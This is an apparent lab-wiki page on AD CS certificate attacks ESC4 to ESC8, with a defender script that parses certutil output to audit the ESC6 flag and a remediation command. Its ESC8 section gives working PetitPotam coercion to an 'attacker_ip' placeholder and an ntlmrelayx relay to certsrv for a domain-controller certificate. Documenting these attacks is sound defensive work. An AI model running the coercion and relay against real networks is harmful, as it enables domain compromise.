
ESC4–ESC8 — CA-Level and ACL Attacks

Status: Scaffold — content in progress

ATT&CK: T1649
Severity: Critical

ESC4 — Vulnerable Template ACL

An attacker with WriteDACL, WriteOwner, or GenericWrite on a certificate template can modify the template to become vulnerable to ESC1 (add SAN flag, add Client Auth EKU), then enroll.

ESC6 — EDITF_ATTRIBUTESUBJECTALTNAME2 CA Flag

If the CA has the EDITF_ATTRIBUTESUBJECTALTNAME2 flag set in its EditFlags, it honours a subject alternative name supplied as a request attribute regardless of the template, so every template a low-privileged principal can enroll in behaves like an ESC1 template.

certutil -config "CA\ITDR-CA" -getreg policy\EditFlags
# If EDITF_ATTRIBUTESUBJECTALTNAME2 is set → ESC6
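An added defender-side helper (not part of this page or of any tool it names) that parses the certutil output above and reports whether the ESC6 flag is set; the sample outputs are constructed and the CA name ITDR-CA is taken from the command on this page.

```python
import re

# Bit value of EDITF_ATTRIBUTESUBJECTALTNAME2 inside the EditFlags DWORD.
EDITF_ATTRIBUTESUBJECTALTNAME2 = 0x40000

# Constructed sample of `certutil -config "CA\ITDR-CA" -getreg policy\EditFlags`
# from a CA that has the flag set (0x11014e defaults + 0x40000).
SAMPLE_VULNERABLE = """\
HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\CertSvc\\Configuration\\ITDR-CA\\PolicyModules\\CertificateAuthority_MicrosoftDefault.Policy:

  EditFlags REG_DWORD = 15014e (1376590)
    EDITF_REQUESTEXTENSIONLIST -- 2
    EDITF_DISABLEEXTENSIONLIST -- 4
    EDITF_ADDOLDKEYUSAGE -- 8
    EDITF_BASICCONSTRAINTSCRITICAL -- 40 (64)
    EDITF_ENABLEAKIKEYID -- 100 (256)
    EDITF_ENABLEDEFAULTSMIME -- 10000 (65536)
    EDITF_ATTRIBUTESUBJECTALTNAME2 -- 40000 (262144)
    EDITF_ENABLECHASECLIENTDC -- 100000 (1048576)
CertUtil: -getreg command completed successfully.
"""

# Constructed sample from a CA without the flag (only the lines the parser needs).
SAMPLE_SAFE = """\
  EditFlags REG_DWORD = 11014e (1114446)
    EDITF_REQUESTEXTENSIONLIST -- 2
    EDITF_ENABLECHASECLIENTDC -- 100000 (1048576)
CertUtil: -getreg command completed successfully.
"""


def parse_edit_flags(certutil_output: str) -> int:
    """Return the EditFlags DWORD (certutil prints it in hex) or raise if absent."""
    m = re.search(r"EditFlags\s+REG_DWORD\s*=\s*([0-9a-fA-F]+)", certutil_output)
    if not m:
        raise ValueError("EditFlags value not found in certutil output")
    return int(m.group(1), 16)


def set_flag_names(certutil_output: str) -> list[str]:
    """Flag names certutil decoded under the EditFlags line (for the audit report)."""
    return re.findall(r"^\s+(EDITF_[A-Z0-9_]+)\s+--", certutil_output, re.M)


def audit_esc6(certutil_output: str) -> dict:
    """Flag the CA as ESC6-exposed when the SAN2 bit is set; also cross-check the
    decoded name list against the raw DWORD so a truncated capture is noticed."""
    flags = parse_edit_flags(certutil_output)
    exposed = bool(flags & EDITF_ATTRIBUTESUBJECTALTNAME2)
    listed = "EDITF_ATTRIBUTESUBJECTALTNAME2" in set_flag_names(certutil_output)
    return {"edit_flags": flags, "esc6": exposed, "consistent": exposed == listed}
```

Remediation on the CA is `certutil -config "CA\ITDR-CA" -setreg policy\EditFlags -EDITF_ATTRIBUTESUBJECTALTNAME2` followed by a restart of the CertSvc service, after which the audit should report `esc6: False`.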

ESC7 — Vulnerable CA ACL

If a low-privilege user has ManageCA or ManageCertificates on the CA:

  • ManageCertificates → approve pending certificate requests
  • ManageCA → change CA configuration flags (e.g., set EDITF_ATTRIBUTESUBJECTALTNAME2, introducing ESC6)

ESC8 — NTLM Relay to ADCS HTTP Endpoint

AD CS Web Enrollment (certsrv) accepts NTLM authentication over HTTP by default. An attacker in a man-in-the-middle position can relay NTLM credentials (e.g., from a machine account via coercion) to the certsrv endpoint and obtain a certificate for the relayed account (e.g., Domain Controller machine account → DCSync rights).

# Coerce DC to authenticate to attacker
PetitPotam.py -d itdr.lab -u user -p pass attacker_ip dc01_ip

# Relay to certsrv (on separate terminal)
ntlmrelayx.py -t http://ca.itdr.lab/certsrv/certfnsh.asp --adcs --template DomainController

Related topics:

  • ADCS Protocol (adcs)
  • ESC1 (esc1-template-abuse)
  • Detection (detect-certificate-attacks)